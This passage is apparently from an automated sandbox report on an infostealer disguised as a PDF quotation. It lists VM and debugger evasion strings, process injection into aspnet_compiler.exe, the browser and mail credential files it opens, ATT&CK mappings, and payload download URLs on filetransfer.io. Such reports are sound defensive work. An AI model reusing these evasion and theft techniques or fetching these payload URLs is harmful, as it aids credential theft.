                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796282Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1796063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1795079Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794954Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794829Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794704Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794579Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794454Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 1794204Jump to behavior
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware\V
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: explorer9SbieDll.dll:select * from Win32_BIOS8Unexpected WMI query failure;version<SerialNumber>VMware|VIRTUAL|A M I|Xen?select * from Win32_ComputerSystem@manufacturerAmodelBMicrosoft|VMWare|VirtualCjohnDannaExxxxxxxx
                      Source: aspnet_compiler.exe, 00000004.00000002.2893835187.0000000001483000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{
                      Source: aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMwareLR^q
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 2VlzbluUgkSZnLn D6Fmwmt@\^q0Microsoft|VMWare|V<
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2221759738.0000000000DF2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen@\^q
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWareLR^qD>
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Microsoft|VMWare|Virtual
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware|VIRTUAL|A M I|Xen(_^q
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen%
                      Source: aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q 1:en-CH:Microsoft|VMWare|Virtual
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q 1:en-CH:VMware|VIRTUAL|A M I|Xen
                      Source: QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.000000000304D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 5VCVK H13T62W85P@\^q0VMware|VIRTUAL|A M<2;
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeCode function: 0_2_07485470 CheckRemoteDebuggerPresent,0_2_07485470
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: E7C008Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeQueries volume information: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\QUOTATION_APRQTRA031244#U00faPDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.2d48e7c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_APRQTRA031244#U00faPDF.scr.exe PID: 5356, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7700, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.42c9610.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3cc95d0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.42c9610.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.9090000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.9090000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3cc95d0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2246378336.0000000009090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.2d48e7c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2896066000.0000000003075000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_APRQTRA031244#U00faPDF.scr.exe PID: 5356, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7700, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.2d48e7c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: QUOTATION_APRQTRA031244#U00faPDF.scr.exe PID: 5356, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7700, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.42c9610.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3cc95d0.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.42c9610.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.9090000.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.9090000.16.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3cc95d0.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.QUOTATION_APRQTRA031244#U00faPDF.scr.exe.3c39f48.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2246378336.0000000009090000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      211
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      21
                      Input Capture
                      34
                      System Information Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      2
                      Obfuscated Files or Information
                      Security Account Manager1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing
                      NTDS431
                      Security Software Discovery
                      Distributed Component Object Model21
                      Input Capture
                      3
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSH1
                      Clipboard Data
                      Fallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials161
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items161
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      QUOTATION_APRQTRA031244#U00faPDF.scr.exe53%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                      QUOTATION_APRQTRA031244#U00faPDF.scr.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://ocsp.thawte.com00%URL Reputationsafe
                      https://s22.filetransfer.io/storage/download/fNtpaSFzWEzZ0%Avira URL Cloudsafe
                      http://filetransfer.io/data-package/aPtWC5T9/download0%Avira URL Cloudsafe
                      https://s22.filetransfer.io0%Avira URL Cloudsafe
                      https://filetransfer.io/data-package/aPtWC5T9/download0%Avira URL Cloudsafe
                      https://filetransfer.io0%Avira URL Cloudsafe
                      http://filetransfer.io0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      filetransfer.io
                      104.21.13.139
                      truefalse
                        unknown
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          s22.filetransfer.io
                          104.21.13.139
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://s22.filetransfer.io/storage/download/fNtpaSFzWEzZfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://filetransfer.io/data-package/aPtWC5T9/downloadfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://filetransfer.io/data-package/aPtWC5T9/downloadfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ip-api.com/line/?fields=hostingfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://github.com/mgravell/protobuf-netiQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://stackoverflow.com/q/14436606/23354QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002EF6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002BB6000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://account.dyn.com/QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2892713170.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://crl.thawte.com/ThawteTimestampingCA.crl0QUOTATION_APRQTRA031244#U00faPDF.scr.exefalse
                                        high
                                        https://s22.filetransfer.ioQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://stackoverflow.com/q/11564914/23354;QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://stackoverflow.com/q/2152978/23354QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.thawte.com0QUOTATION_APRQTRA031244#U00faPDF.scr.exefalse
                                            • URL Reputation: safe
                                            unknown
                                            http://ip-api.comaspnet_compiler.exe, 00000004.00000002.2896066000.0000000003041000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003117000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://filetransfer.ioQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://github.com/mgravell/protobuf-netQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2243098411.0000000007160000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004599000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2226154366.0000000004651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://filetransfer.ioQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION_APRQTRA031244#U00faPDF.scr.exe, 00000000.00000002.2222485023.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.0000000003041000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000004.00000002.2896066000.00000000030FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.21.13.139
                                                  filetransfer.ioUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  208.95.112.1
                                                  ip-api.comUnited States
